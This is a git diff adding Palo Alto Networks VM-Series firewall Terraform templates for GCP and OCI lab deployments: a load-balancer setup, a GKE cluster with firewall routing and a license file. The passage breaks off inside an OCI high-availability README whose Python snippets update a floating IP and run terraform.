diff --git a/gcp/ilbnh-mig/servers.tf b/gcp/ilbnh-mig/servers.tf
new file mode 100644
index 00000000..fe563ba5
--- /dev/null
+++ b/gcp/ilbnh-mig/servers.tf
@@ -0,0 +1,29 @@
+#-----------------------------------------------------------------------------------------------
+# Create N webservers in one subnet. N is determined by the number of hostnames in the list
+module "server1" {
+ source = "./modules/vm/"
+ names = var.server1_vms
+ zones = [data.google_compute_zones.available.names[0]]
+ subnetworks = [module.vpc0.subnetwork_self_link]
+ server_ips = var.server1_ips
+ server_public_ip = var.server_public_ip
+ machine_type = var.server_size
+ image = var.server_image
+ ssh_key = fileexists(var.public_key_path) ? "${var.server_user}:${file(var.public_key_path)}" : ""
+ startup_script = file("${path.module}/scripts/webserver-startup.sh")
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create X webservers in another subnet. X is determined by the number of hostnames in the list
+module "server2" {
+ source = "./modules/vm/"
+ names = var.server2_vms
+ zones = [data.google_compute_zones.available.names[0]]
+ subnetworks = [module.vpc2.subnetwork_self_link]
+ server_ips = var.server2_ips
+ server_public_ip = var.server_public_ip
+ machine_type = var.server_size
+ image = var.server_image
+ ssh_key = fileexists(var.public_key_path) ? "${var.server_user}:${file(var.public_key_path)}" : ""
+ startup_script = file("${path.module}/scripts/webserver-startup.sh")
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/terraform.tfvars b/gcp/ilbnh-mig/terraform.tfvars
new file mode 100644
index 00000000..31dd7687
--- /dev/null
+++ b/gcp/ilbnh-mig/terraform.tfvars
@@ -0,0 +1,48 @@
+project_id = ""
+auth_file = ""
+public_key_path = "" # Your SSH Key
+
+#fw_panos = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL
+fw_panos = "bundle1-904" # PAN-OS 9.0.4 - PAYG Bundle 1 (default)
+#fw_panos = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2
+
+
+#-------------------------------------------------------------------
+region = "us-central1"
+
+vpc0 = "testing"
+vpc0_subnet = "testing-subnet"
+vpc0_cidr = "10.30.1.0/24"
+
+vpc1 = "mgmt"
+vpc1_subnet = "mgmt-subnet"
+vpc1_cidr = "10.60.1.0/24"
+
+vpc2 = "production"
+vpc2_subnet = "production-subnet"
+vpc2_cidr = "10.50.1.0/24"
+
+vpc3 = "production2"
+vpc3_subnet = "production2-subnet"
+vpc3_cidr = "10.40.1.0/24"
+
+fw_base_name = "vmseries"
+fw_machine_type = "n1-standard-4"
+target_size = "1"
+
+mgmt_sources = ["0.0.0.0/0"]
+health_check_port = "22"
+all_ports = true
+
+server_user = "demo"
+server_size = "f1-micro"
+server_image = "ubuntu-os-cloud/ubuntu-1604-lts"
+server_public_ip = true
+server1_vms = ["testing-vm"]
+server1_ips = ["10.30.1.100"]
+
+server2_vms = ["production-vm"]
+server2_ips = ["10.50.1.100"]
+
+ilb1_ip = "10.30.1.99"
+ilb2_ip = "10.50.1.99"
diff --git a/gcp/ilbnh-mig/variables.tf b/gcp/ilbnh-mig/variables.tf
new file mode 100644
index 00000000..98a46495
--- /dev/null
+++ b/gcp/ilbnh-mig/variables.tf
@@ -0,0 +1,122 @@
+variable project_id {
+ description = "GCP Project ID"
+}
+
+variable auth_file {
+ description = "GCP Project auth file"
+ default = ""
+}
+
+variable region {
+}
+
+variable fw_panos {
+ description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)"
+}
+
+variable fw_image {
+ default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+}
+
+variable fw_base_name {
+}
+
+variable target_size {
+}
+
+variable fw_machine_type {
+}
+
+variable mgmt_sources {
+ type = list(string)
+}
+
+variable health_check_port {
+ description = "Port the ILB will health check"
+ default = "22"
+}
+
+variable all_ports {
+ description = "Enable all ports on the ILB"
+ default = true
+}
+variable vpc1 {
+}
+
+variable vpc1_subnet {
+}
+
+variable vpc1_cidr {
+}
+
+variable vpc0 {
+}
+
+variable vpc0_subnet {
+}
+
+variable vpc0_cidr {
+}
+
+variable vpc2 {
+}
+
+variable vpc2_subnet {
+}
+
+variable vpc2_cidr {
+}
+
+variable vpc3 {
+}
+
+variable vpc3_subnet {
+}
+
+variable vpc3_cidr {
+}
+
+variable server1_vms {
+ type = list(string)
+}
+
+variable server1_ips {
+ type = list(string)
+}
+
+variable server2_vms {
+ type = list(string)
+}
+
+variable server_user {
+ description = "SSH user for Linux VM"
+}
+
+variable server2_ips {
+ type = list(string)
+}
+
+variable server_size {
+ description = "Machine size for the server VMs"
+}
+
+variable server_image {
+ description = "OS image for server installation"
+}
+
+variable server_public_ip {
+ description = "Should we assign a public IP to the server"
+ default = false
+}
+
+variable public_key_path {
+ description = "Local path to public SSH key. If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin"
+}
+
+variable ilb1_ip {
+ description = "IP address for ILB1"
+}
+
+variable ilb2_ip {
+ description = "IP address for ILB2"
+}
diff --git a/gcp/k8s-Prisma-API/.gitignore b/gcp/k8s-Prisma-API/.gitignore
new file mode 100644
index 00000000..8d51dd09
--- /dev/null
+++ b/gcp/k8s-Prisma-API/.gitignore
@@ -0,0 +1,2 @@
+# pycharm
+.DS_Store
diff --git a/gcp/k8s-Prisma-API/.meta-cnc.yaml b/gcp/k8s-Prisma-API/.meta-cnc.yaml
new file mode 100644
index 00000000..e651d353
--- /dev/null
+++ b/gcp/k8s-Prisma-API/.meta-cnc.yaml
@@ -0,0 +1,43 @@
+name: gke_k8s_EW_inspection
+
+# label should be a human readable label that conveys what this skillet will do
+label: GCP 4-node k8s cluster with VM-Series Firewall
+
+description: This skillet deploys a 4-node GCP k8s cluster with a VM-Series Firewall for both N/S and E/W Inspection. This is the base deployment used in the Ignite 19 k8s HOW lab. There is also a guide that walks through deploying a 2 tier container application and Prisma Public Cloud API scanning.
+
+# type instructs Panhandler how to consume this skillet
+type: terraform
+
+# extends allows you to include other skillets along with this one
+extends:
+
+# labels allow extensible configuration options per skillet type. For example, labels can be used to
+# group multiple skillets of the same type (pan-os skillets labeled as version: 9.0 for example)
+labels:
+ collection: GCP K8s Prisma API
+
+
+# Variables will be presented to the user via the Panhandler GUI. These values will then be passed to
+# the terraform binary as '--var' options, thus overriding any tfvars entries.
+# Variable names MUST match the names of the defined terraform variables
+variables:
+ - name: container-ver
+ description: GCP Container Ver
+ default: 1.11.10-gke.4
+ type_hint: gcloud container get-server-config --zone us-central1
+ - name: my_gcp_project
+ description: GCP Project
+ default: djs-gcp-2018
+ type_hint: project id
+ - name: region
+ description: GCP Region
+ default: us-central1
+ type_hint: text
+ - name: zone
+ description: GCP Zone
+ default: us-central1-a
+ type_hint: text
+ - name: credentials_file_path
+ description: Path to the JSON file used to describe your account credentials
+ default: djs-gcp-2018-creds.json
+ type_hint: text
diff --git a/gcp/k8s-Prisma-API/LICENSE b/gcp/k8s-Prisma-API/LICENSE
new file mode 100644
index 00000000..261eeb9e
--- /dev/null
+++ b/gcp/k8s-Prisma-API/LICENSE
@@ -0,0 +1,201 @@
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/gcp/k8s-Prisma-API/Main.tf b/gcp/k8s-Prisma-API/Main.tf
new file mode 100644
index 00000000..92932bc5
--- /dev/null
+++ b/gcp/k8s-Prisma-API/Main.tf
@@ -0,0 +1,358 @@
+provider "google" {
+ credentials = "${file(var.credentials_file_path)}"
+ project = "${var.my_gcp_project}"
+ region = "${var.region}"
+}
+
+// Adding SSH Public Key Project Wide
+resource "google_compute_project_metadata_item" "ssh-keys" {
+ key = "ssh-keys"
+ value = "${var.gce_ssh_user}:${var.gce_ssh_pub_key}"
+}
+
+// Adding VPC Networks to Project MANAGEMENT
+resource "google_compute_subnetwork" "management-sub" {
+ name = "management-sub"
+ ip_cidr_range = "10.5.0.0/24"
+ network = "${google_compute_network.management.self_link}"
+ region = "${var.region}"
+}
+
+resource "google_compute_network" "management" {
+ name = "${var.interface_0_name}"
+ auto_create_subnetworks = "false"
+}
+
+// Adding VPC Networks to Project UNTRUST
+resource "google_compute_subnetwork" "untrust-sub" {
+ name = "untrust-sub"
+ ip_cidr_range = "10.5.1.0/24"
+ network = "${google_compute_network.untrust.self_link}"
+ region = "${var.region}"
+}
+
+resource "google_compute_network" "untrust" {
+ name = "${var.interface_1_name}"
+ auto_create_subnetworks = "false"
+}
+
+// Adding VPC Networks to Project TRUST
+resource "google_compute_subnetwork" "trust-sub" {
+ name = "trust-sub"
+ ip_cidr_range = "10.5.2.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ region = "${var.region}"
+}
+
+resource "google_compute_network" "trust" {
+ name = "${var.interface_2_name}"
+ auto_create_subnetworks = "false"
+}
+
+// Adding GCP Outbound Route to TRUST Interface
+resource "google_compute_route" "trust" {
+ name = "trust-route"
+ dest_range = "0.0.0.0/0"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 100
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ "google_compute_instance.firewall",
+ "google_container_node_pool.db_nodes",
+ ]
+}
+
+// Adding GCP Route to Cluster MGMT Endpoint
+resource "google_compute_route" "k8mgmt" {
+ name = "cluster-endpoint-route"
+ dest_range = "${element(google_container_cluster.cluster.*.endpoint,count.index)}/32"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_gateway = "default-internet-gateway"
+ priority = 100
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ "google_compute_instance.firewall",
+ "google_container_node_pool.db_nodes",
+ ]
+}
+
+// Adding GCP Firewall Rules for MANAGEMENT
+resource "google_compute_firewall" "allow-mgmt" {
+ name = "allow-mgmt"
+ network = "${google_compute_network.management.self_link}"
+
+ allow {
+ protocol = "icmp"
+ }
+
+ allow {
+ protocol = "tcp"
+ ports = ["443", "22"]
+ }
+
+ source_ranges = ["0.0.0.0/0"]
+}
+
+// Adding GCP Firewall Rules for INBOUND
+resource "google_compute_firewall" "allow-inbound" {
+ name = "allow-inbound"
+ network = "${google_compute_network.untrust.self_link}"
+
+ allow {
+ protocol = "tcp"
+ ports = ["80", "22", "8888"]
+ }
+
+ source_ranges = ["0.0.0.0/0"]
+}
+
+// Adding GCP Firewall Rules for OUTBOUND
+resource "google_compute_firewall" "allow-outbound" {
+ name = "allow-outbound"
+ network = "${google_compute_network.trust.self_link}"
+
+ allow {
+ protocol = "all"
+
+ # ports = ["all"]
+ }
+
+ source_ranges = ["0.0.0.0/0"]
+}
+
+// Create a new Palo Alto Networks NGFW VM-Series GCE instance
+resource "google_compute_instance" "firewall" {
+ name = "${var.firewall_name}-${count.index + 1}"
+ machine_type = "${var.machine_type_fw}"
+ zone = "${var.zone}"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ count = 1
+
+ // Adding METADATA Key Value pairs to VM-Series GCE instance
+ metadata {
+ vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket_fw}"
+ serial-port-enable = true
+
+ #sshKeys = "${var.public_key}"
+ }
+
+ service_account {
+ scopes = "${var.scopes_fw}"
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.management-sub.self_link}"
+ network_ip = "10.5.0.4"
+
+ //address = "10.5.0.4"
+ access_config = {}
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.untrust-sub.self_link}"
+
+ network_ip = "10.5.1.4"
+ access_config = {}
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.trust-sub.self_link}"
+
+ network_ip = "10.5.2.100"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.image_fw}"
+ }
+ }
+
+ depends_on = [
+ "google_compute_network.trust",
+ "google_compute_subnetwork.trust-sub",
+ ]
+}
+
+//Create a K8s cluster
+resource "google_container_cluster" "cluster" {
+ name = "cluster-1"
+ zone = "${var.zone}"
+ min_master_version = "${var.container-ver}"
+ initial_node_count = 2
+ enable_kubernetes_alpha = true
+ cluster_ipv4_cidr = "10.16.0.0/14"
+ logging_service = "none"
+ monitoring_service = "none"
+ network = "${google_compute_network.trust.self_link}"
+ subnetwork = "${google_compute_subnetwork.trust-sub.self_link}"
+
+ maintenance_policy {
+ daily_maintenance_window {
+ start_time = "03:00"
+ }
+ }
+
+ addons_config {
+ http_load_balancing {
+ disabled = false
+ }
+
+ horizontal_pod_autoscaling {
+ disabled = false
+ }
+ }
+
+ node_config {
+ disk_size_gb = "32"
+ image_type = "COS"
+ machine_type = "n1-standard-1"
+ preemptible = false
+ oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"]
+
+ labels {
+ pool = "web-pool"
+ cluster = "the-cluster"
+ }
+
+ tags = ["the-cluster", "gke-node", "web-tier"]
+ }
+
+ lifecycle {
+ create_before_destroy = true
+ }
+
+ depends_on = [
+ "google_compute_network.trust",
+ "google_compute_subnetwork.trust-sub",
+ "google_compute_instance.firewall",
+ ]
+}
+
+resource "google_container_node_pool" "db_nodes" {
+ name = "db-node-pool"
+ region = "${var.zone}"
+ cluster = "${google_container_cluster.cluster.name}"
+ node_count = 2
+
+ node_config {
+ disk_size_gb = "32"
+ image_type = "COS"
+ machine_type = "n1-standard-1"
+ preemptible = false
+ oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"]
+
+ labels {
+ pool = "db-pool"
+ cluster = "the-cluster"
+ }
+
+ tags = ["the-cluster", "gke-node", "db-tier"]
+ }
+
+ lifecycle {
+ create_before_destroy = true
+ }
+
+ depends_on = [
+ "google_compute_network.trust",
+ "google_compute_subnetwork.trust-sub",
+ "google_compute_instance.firewall",
+ "google_container_cluster.cluster",
+ ]
+}
+
+// Adding GCP Route to Node instances
+resource "google_compute_route" "gke-node0" {
+ name = "gke-node0"
+ dest_range = "10.16.0.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 10
+ tags = ["db-tier"]
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ ]
+}
+
+resource "google_compute_route" "gke-node1" {
+ name = "gke-node1"
+ dest_range = "10.16.1.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 10
+ tags = ["db-tier"]
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ ]
+}
+
+resource "google_compute_route" "gke-node2" {
+ name = "gke-node2"
+ dest_range = "10.16.2.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 10
+ tags = ["web-tier"]
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ ]
+}
+
+resource "google_compute_route" "gke-node3" {
+ name = "gke-node3"
+ dest_range = "10.16.3.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 10
+ tags = ["web-tier"]
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ ]
+}
+
+output "pan-tf-name" {
+ value = "${google_compute_instance.firewall.*.name}"
+}
+
+output "k8s-cluster-name" {
+ value = "${google_container_cluster.cluster.*.name}"
+}
+
+output "k8s-cluster-endpoint" {
+ value = "${google_container_cluster.cluster.*.endpoint}"
+}
+
+output "k8s-cluster_ipv4_cidr" {
+ value = "${google_container_cluster.cluster.*.cluster_ipv4_cidr}"
+}
diff --git a/gcp/k8s-Prisma-API/README.md b/gcp/k8s-Prisma-API/README.md
new file mode 100644
index 00000000..ccfbe6c9
--- /dev/null
+++ b/gcp/k8s-Prisma-API/README.md
@@ -0,0 +1,2 @@
+# k8s-terraform-skillet
+This repository holds the Terraform template, in PANW Skillet format, to deploy a GKE k8s cluster that supports E/W inspection.
diff --git a/gcp/k8s-Prisma-API/Variables.tf b/gcp/k8s-Prisma-API/Variables.tf
new file mode 100644
index 00000000..fdb1944c
--- /dev/null
+++ b/gcp/k8s-Prisma-API/Variables.tf
@@ -0,0 +1,72 @@
+// PROJECT Variables
+variable "container-ver" {
+ default = "1.11.8-gke.6"
+}
+
+variable "my_gcp_project" {
+ default = "djs-gcp-2018"
+}
+
+variable "region" {
+ default = "us-central1"
+}
+
+variable "zone" {
+ default = "us-central1-a"
+}
+
+variable "credentials_file_path" {
+ description = "Path to the JSON file used to describe your account credentials"
+ default = "/Users/dspears/GCP/k8-test/djs-gcp-2018-creds.json"
+}
+
+variable "gce_ssh_user" {
+ description = "SSH user associated with the public key"
+ default = "dspears@SJCMAC3024G8WL"
+}
+
+variable "gce_ssh_pub_key" {
+ description = "SSH public key in the format: ssh-rsa <key> <user>"
+ default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bjwWN/LY87FOZH/uuRXS5ku3OXkxsFIvecXMNDoeTNZU5QSM3bAV8t/IU52GsdQO+f2hv9iVulMfYPwxsMcVen32q+t6dcgtChUXPSk+giGqf71iR2xiqGdk6GgC705SUXG/AX1whNI1qT84wP0nOrJaoGo/SZq4Ryel9mptu1Ifj1vMphyw2WOFOMB3IuUYckZHgwbQxZK4iCGJSZmzP+M03oSKZATwvuI1XXUIUVTCcV45NofgCW3Ocfk0UjhK01l1SO3H4+c+v40Zufpqo4vPMOQajTggygpJ7SRCgOYWJxcdx4cr9ASNteii5LQFqAixJD0+0izXfQEUm0/T dspears@SJCMAC3024G8WL"
+}
+
+// The rest of the variables do not need to be modified for the K8s Lab
+// VM-Series Firewall Variables
+
+variable "firewall_name" {
+ default = "firewall"
+}
+
+variable "image_fw" {
+ default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-810"
+
+ //default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810"
+}
+
+variable "machine_type_fw" {
+ default = "n1-standard-4"
+}
+
+variable "bootstrap_bucket_fw" {
+ default = "k8-ew"
+}
+
+variable "interface_0_name" {
+ default = "management"
+}
+
+variable "interface_1_name" {
+ default = "untrust"
+}
+
+variable "interface_2_name" {
+ default = "trust"
+}
+
+variable "scopes_fw" {
+ default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
diff --git a/oci/HA/OCI HA deployment guide.pdf b/oci/HA/OCI HA deployment guide.pdf
new file mode 100644
index 00000000..d41da875
Binary files /dev/null and b/oci/HA/OCI HA deployment guide.pdf differ
diff --git a/oci/HA/OCI-HA.png b/oci/HA/OCI-HA.png
new file mode 100644
index 00000000..128459fc
Binary files /dev/null and b/oci/HA/OCI-HA.png differ
diff --git a/oci/HA/README.md b/oci/HA/README.md
new file mode 100644
index 00000000..3928a15c
--- /dev/null
+++ b/oci/HA/README.md
@@ -0,0 +1,32 @@
+# Sample HA deployment for OCI
+
+Terraform creates:
+- A single compartment to house all infrastructure
+- A VCN with 5 regional subnets (management, untrust, trust, ha2, web)
+- 2 VM-Series firewalls in separate Availability Domains (ADs)
+- A test server
+- OCI Dynamic Groups and Policies for secondary IP address management
+
+HA in OCI works by moving the secondary (floating) IP addresses from the failed firewall to the newly active one. This is handled by the VM-Series plugin for OCI, available beginning with PAN-OS 9.1.1.
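+
+For illustration, the operation the plugin performs at failover is essentially an UpdatePrivateIp call that re-parents the floating secondary IP onto the surviving firewall's VNIC. A rough sketch with the OCI Python SDK is shown below; the OCIDs are placeholders, and in the deployed solution the plugin does this for you:
+
+```python
+import oci
+
+config = oci.config.from_file()                    # reads ~/.oci/config
+network = oci.core.VirtualNetworkClient(config)
+
+floating_ip_ocid = "ocid1.privateip.oc1..example"  # e.g. the trust or untrust floating IP
+surviving_vnic_ocid = "ocid1.vnic.oc1..example"    # VNIC on the newly active firewall
+
+# Re-parenting the secondary private IP onto the other VNIC also carries over any
+# reserved public IP that is bound to it.
+network.update_private_ip(
+    floating_ip_ocid,
+    oci.core.models.UpdatePrivateIpDetails(vnic_id=surviving_vnic_ocid),
+)
+```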
+
+Prior to deployment, update terraform.tfvars with the following information:
+- tenancy_ocid - The OCID of the target tenancy
+- user_ocid - The OCID of the user deploying the infrastructure
+- fingerprint - The fingerprint associated with the user's API key
+- private_key_path - The absolute path to the PEM-formatted private API signing key for the user
+- parent_compartment_ocid - The OCID of the parent/root compartment
+- ssh_authorized_key - The public SSH key for the user (format = "ssh-rsa ")
+- fw_mgmt_src_ip - The IP or subnet authorized to connect to the FW post-deployment
+
+By default, the deployment is into us-ashburn-1. This may be altered by changing the relevant variables in terraform.tfvars.
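+
+If you prefer to drive the deployment from a script rather than typing the CLI commands, a minimal sketch is shown below. It assumes the Terraform CLI is installed, terraform.tfvars has been populated, and the script is run from the oci/HA directory; the plan file name is arbitrary:
+
+```python
+import subprocess
+
+def run(cmd):
+    """Run a terraform command and stop on the first failure."""
+    print("$", " ".join(cmd))
+    subprocess.run(cmd, check=True)
+
+run(["terraform", "init"])
+run(["terraform", "plan", "-out", "oci-ha.plan"])
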